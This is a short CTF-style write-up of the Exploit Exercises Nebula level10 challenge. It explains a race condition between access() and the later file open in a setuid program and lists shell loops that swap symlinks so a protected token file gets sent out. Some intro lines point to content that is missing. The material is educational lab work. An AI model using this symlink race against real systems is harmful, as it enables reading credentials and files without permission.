June 30, 2016 Karn Ganeshen

Exploit Exercises – nebula level10

Researching the requirements of access(), we find this:
The level10 directory has a file x which contains the token (the password for flag10). It shouldn't be there. We need to find a way to transfer the token file.
We don't have read access to the token.
We will need to exploit the race condition between the access() check and the later use of the file in the program code:

Checking how flag10 works normally:

The following steps are needed to exploit the access() race condition:
  1. Create a fake token file – echo fake_toke > /tmp/fake_token
  2. Create a soft link to our fake_token – ln -sf /tmp/fake_token token
  3. Create a soft link to the real token with the same name – ln -s /home/flag10/token token
  4. Execute the two ln commands in a loop – while true; do ln -fs /tmp/fake_token token; ln -fs /home/flag10/token token; done
  5. Execute the file transfer in a loop – while true; do /home/flag10/flag10 token; done


The token is transferred successfully. Use it to log in as flag10 and run getflag.
